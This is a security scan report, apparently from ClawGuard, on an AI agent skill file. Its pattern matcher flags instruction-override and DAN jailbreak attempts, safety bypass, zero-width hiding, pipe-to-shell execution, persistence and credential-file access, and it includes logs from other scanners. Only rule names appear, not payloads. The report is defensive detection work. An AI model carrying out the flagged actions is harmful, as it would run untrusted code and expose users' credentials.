PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:453)
PI-048Zero-width character hiding(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:458)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:701)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:769)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:780)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:781)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:807)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:808)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:821)
MAL-004Access to sensitive credential files(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:848)
PI-041Possible base64-encoded payload(/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md:187)
View logs
clawguard-rules7ms
1[2026-02-12T03:45:25.012Z] Running @yourclaw/clawguard-rules pattern matcher
2Scanning: /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md
3Content length: 26349 chars
4Patterns matched: 46
5  [critical] PI-069: Urgency-based social engineering
6  [critical] PI-001: Direct instruction override attempt
7  [critical] PI-001: Direct instruction override attempt
8  [critical] PI-005: Instruction disregard attempt
9  [critical] PI-013: Privilege escalation attempt
10  [critical] PI-013: Privilege escalation attempt
11  [critical] PI-015: Explicit jailbreak attempt
12  [critical] PI-024: DAN jailbreak variant
13  [critical] PI-015: Explicit jailbreak attempt
14  [critical] PI-008: Safety bypass instruction
15  [critical] MAL-001: Remote code execution via pipe-to-shell pattern
16  [critical] MAL-006: Persistence mechanism installation
17  [critical] MAL-006: Persistence mechanism installation
18  [critical] MAL-006: Persistence mechanism installation
19  [critical] MAL-006: Persistence mechanism installation
20  [critical] MAL-006: Persistence mechanism installation
21  [critical] MAL-006: Persistence mechanism installation
22  [critical] PI-001: Direct instruction override attempt
23  [critical] MAL-001: Remote code execution via pipe-to-shell pattern
24  [critical] MAL-006: Persistence mechanism installation
25  [critical] MAL-006: Persistence mechanism installation
26  [high] PI-003: Identity reassignment attempt
27  [high] MAL-004: Access to sensitive credential files
28  [high] MAL-004: Access to sensitive credential files
29  [high] MAL-004: Access to sensitive credential files
30  [high] MAL-004: Access to sensitive credential files
31  [high] MAL-004: Access to sensitive credential files
32  [high] MAL-004: Access to sensitive credential files
33  [high] MAL-004: Access to sensitive credential files
34  [high] PI-048: Zero-width character hiding
35  [high] PI-048: Zero-width character hiding
36  [high] PI-048: Zero-width character hiding
37  [high] MAL-004: Access to sensitive credential files
38  [high] MAL-004: Access to sensitive credential files
39  [high] PI-048: Zero-width character hiding
40  [high] PI-048: Zero-width character hiding
41  [high] PI-048: Zero-width character hiding
42  [high] MAL-004: Access to sensitive credential files
43  [high] MAL-004: Access to sensitive credential files
44  [high] MAL-004: Access to sensitive credential files
45  [high] MAL-004: Access to sensitive credential files
46  [high] MAL-004: Access to sensitive credential files
47  [high] MAL-004: Access to sensitive credential files
48  [high] MAL-004: Access to sensitive credential files
49  [high] MAL-004: Access to sensitive credential files
50  [low] PI-041: Possible base64-encoded payload
51✓ Completed in 7ms
gitleaks
0 findings157386ms
No findings — all checks passed.
View logs
gitleaks157386ms
1[2026-02-12T03:48:02.398Z] $ gitleaks detect --source /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all --report-format json --report-path /dev/stdout --no-git
2
3⚠ stderr output:
4
5    │╲
6    │ ○
7    ○ ░
8    ░    gitleaks
9
103:48AM FTL Report path is not writable: /dev/stdout error="open /dev/stdout: no such device or address"
11
12Process exited with code 1
13✓ Completed in 157386ms
semgrep
0 findings267726ms
No findings — all checks passed.
View logs
semgrep267726ms
1[2026-02-12T03:49:52.742Z] $ semgrep scan --json --quiet --config auto /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all
2{"version":"1.151.0","results":[],"errors":[],"paths":{"scanned":["/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/SKILL.md","/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/_meta.json"]},"time":{"rules":[],"rules_parse_time":29.118349075317383,"profiling_times":{"config_time":35.40366005897522,"core_time":38.66389870643616,"ignores_time":0.03443312644958496,"total_time":74.20296859741211},"parsing_time":{"total_time":0.0,"per_file_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_files":[]},"scanning_time":{"total_time":0.3789949417114258,"per_file_time":{"mean":0.07579898834228516,"std_dev":0.0053408893963251105},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_files":[]},"matching_time":{"total_time":0.0,"per_file_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_files":[]},"tainting_time":{"total_time":0.0,"per_def_and_rule_time":{"mean":0.0,"std_dev":0.0},"very_slow_stats":{"time_ratio":0.0,"count_ratio":0.0},"very_slow_rules_on_defs":[]},"fixpoint_timeouts":[],"prefiltering":{"project_level_time":0.0,"file_level_time":0.0,"rules_with_project_prefilters_ratio":0.0,"rules_with_file_prefilters_ratio":0.97,"rules_selected_ratio":0.03,"rules_matched_ratio":0.03},"targets":[],"total_bytes":0,"max_memory_bytes":1142878592},"engine_requested":"OSS","skipped_rules":[],"profiling_results":[]}
3
4Process exited with code 0
5✓ Completed in 267726ms
mcp-scan
1 finding180153ms
MCP-W004The MCP server is not in our registry.
View logs
mcp-scan180153ms
1[2026-02-12T03:48:25.172Z] $ mcp-scan --skills /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all --json
2{
3  "/tmp/clawguard-scan-oe5ogh/repo/skills/hichana": {
4    "client": "not-available",
5    "path": "/tmp/clawguard-scan-oe5ogh/repo/skills/hichana",
6    "servers": [
7      {
8        "name": "one-skill-to-rule-them-all",
9        "server": {
10          "path": "/tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all",
11          "type": "skill"
12        },
13        "signature": null,
14        "error": {
15          "message": "could not inspect skill",
16          "exception": "while scanning a simple key\n  in \"<unicode string>\", line 6, column 1:\n    Look for hidden or encoded conte ... \n    ^\ncould not find expected ':'\n  in \"<unicode string>\", line 8, column 1:\n    ### 2. Detect Threats\n    ^",
17          "traceback": "Traceback (most recent call last):\n  File \"**REDACTED**\", line 178, in inspect_extension\n    signature = inspect_skill(config)\n                ^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 48, in inspect_skill\n    yaml_data = yaml.safe_load(yaml_content)\n                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 125, in safe_load\n    return load(stream, SafeLoader)\n           ^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 81, in load\n    return loader.get_single_data()\n           ^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 49, in get_single_data\n    node = self.get_single_node()\n           ^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 36, in get_single_node\n    document = self.compose_document()\n               ^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 55, in compose_document\n    node = self.compose_node(None, None)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 84, in compose_node\n    node = self.compose_mapping_node(anchor)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 133, in compose_mapping_node\n    item_value = self.compose_node(node, item_key)\n                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 64, in compose_node\n    if self.check_event(AliasEvent):\n       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 98, in check_event\n    self.current_event = self.state()\n                         ^^^^^^^^^^^^\n  File \"**REDACTED**\", line 449, in parse_block_mapping_value\n    if not self.check_token(KeyToken, ValueToken, BlockEndToken):\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 115, in check_token\n    while self.need_more_tokens():\n          ^^^^^^^^^^^^^^^^^^^^^^^\n  File \"**REDACTED**\", line 152, in need_more_tokens\n    self.stale_possible_simple_keys()\n  File \"**REDACTED**\", line 291, in stale_possible_simple_keys\n    raise ScannerError(\"while scanning a simple key\", key.mark,\nyaml.scanner.ScannerError: while scanning a simple key\n  in \"<unicode string>\", line 6, column 1:\n    Look for hidden or encoded conte ... \n    ^\ncould not find expected ':'\n  in \"<unicode string>\", line 8, column 1:\n    ### 2. Detect Threats\n    ^\n",
18          "is_failure": true,
19          "category": "skill_scan_error",
20          "server_output": null
21        }
22      }
23    ],
24    "issues": [
25      {
26        "code": "W004",
27        "message": "The MCP server is not in our registry.",
28        "reference": [
29          0,
30          null
31        ],
32        "extra_data": null
33      }
34    ],
35    "labels": [
36      []
37    ],
38    "error": null
39  }
40}
41
42Process exited with code 0
43✓ Completed in 180153ms
npm-audit
No package.json found — skipping npm audit
No package.json found — skipping npm audit
View logs
npm-audit0ms
1No package.json found at /tmp/clawguard-scan-oe5ogh/repo/skills/hichana/one-skill-to-rule-them-all/package.json
2Skipping npm audit.

Scanned: 2/12/2026, 3:49:54 AM